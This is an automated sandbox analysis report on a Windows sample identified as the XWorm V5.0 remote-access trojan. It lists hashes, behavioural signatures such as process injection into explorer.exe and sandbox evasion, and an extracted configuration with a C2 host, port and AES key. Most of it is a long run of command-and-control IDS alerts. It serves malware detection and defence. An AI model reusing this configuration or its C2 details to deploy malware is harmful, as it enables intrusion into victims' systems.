Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FUDE.bin.exe

Overview

General Information

Sample name:FUDE.bin.exe
Analysis ID:1487488
MD5:36a75d896d48d43a54a8792fd92f3912
SHA1:c5b66bd600539b7d7e60792fd96a385335645d97
SHA256:ec180bdb56a4f587fd198e4bb4d20f488a0124228bfed11ff62f2a20d0d9e618
Tags:exexworm
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Yara signature match

Classification

  • System is w10x64
  • FUDE.bin.exe (PID: 3084 cmdline: "C:\Users\user\Desktop\FUDE.bin.exe" MD5: 36A75D896D48D43A54A8792FD92F3912)
    • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: 91A0CE504DBB22915734E1A3F3C76533)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
{"C2 url": ["127.0.0.1", "ads-jeremy.gl.at.ply.gg"], "Port": "39129", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.0"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\file.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\file.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c65:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d02:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e17:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6ad7:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6a65:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6b02:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6c17:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x68d7:$cnc4: POST / HTTP/1.1
      00000002.00000002.4142868111.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Process Memory Space: file.exe PID: 6972JoeSecurity_XWormYara detected XWormJoe Security
          SourceRuleDescriptionAuthorStrings
          2.0.file.exe.c40000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            2.0.file.exe.c40000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6c65:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6d02:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6e17:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6ad7:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            No Snort rule has matched
            Timestamp:2024-08-04T12:55:12.054100+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:03.666562+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:22.009170+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:19.607051+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:04.162220+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:19.414278+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:53.278591+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:06.727310+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:58.871561+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:19.823565+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:43.324630+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:57:00.437174+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:59.408660+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:36.371953+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:44.878535+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:38.217006+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:56.743014+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:11.358986+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:35.126136+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:13.787089+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:21.196775+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:36.370173+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:35.529623+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:59.409664+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:35.126911+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:43.124107+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:03.265196+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:45.367110+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:35.124193+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:09.289072+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:11.559069+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:40.617286+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:05.947630+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:23.277517+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:09.846382+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:38.213688+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:29.740951+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:44.891784+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:15.720185+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:43.508505+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:50.599276+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:44.584389+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:03.465274+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:19.822257+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:53.538642+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:45.365270+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:03.263663+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:21.397440+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:21.009793+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:21.010943+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:58.355933+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:23.594493+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:27.609238+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:46.549832+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:23.283648+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:15.860799+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:15.720206+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:41.246654+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:35.528197+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:43.755106+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:03.463431+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:09.287190+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:37.997141+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:09.852934+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:11.939224+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:19.217375+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:47.055431+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:11.360680+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:57:06.184542+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:23.266990+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:53.271306+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:57:00.429641+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:27.800134+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:27.983360+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:53.283072+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:10.050900+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:27.611774+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:38.178135+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:50.333997+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:52.577940+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:54.074226+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:35.313279+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:43.323131+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:58.865909+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:57:06.185869+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:37.811232+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:20.811531+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:47.285590+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:14.587142+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:09.223807+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:41.248656+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:56.744524+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:42.221935+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:27.981272+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:52.584380+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:15.743831+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:09.024681+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:21.911230+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:35.311857+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:54.076314+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:13.784981+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:33.214551+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:20.812792+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:53.540850+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:09.022270+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:45.741251+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:57.306074+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:03.976939+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:09.222397+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:05.954744+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:43.228145+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:22.363128+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:42.215104+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:33.212681+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:23.596143+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:43.224505+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:43.130008+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:21.415160+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:19.602157+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:29.736588+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:19.418262+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:14.581580+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:27.797135+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:22.485245+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:22.359163+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:27.588673+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:11.751209+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:43.752626+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:09.407497+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:15.850657+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:22.007653+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:40.620856+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:47.290507+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:45.748978+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:59.663341+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:22.202601+0200
            SID:2855924
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:04.050028+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:12.050051+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:23.266471+0200
            SID:2852874
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:35.124472+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:50.591105+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:38.185121+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:45.557046+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:45.558465+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:03.673819+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:22.605844+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
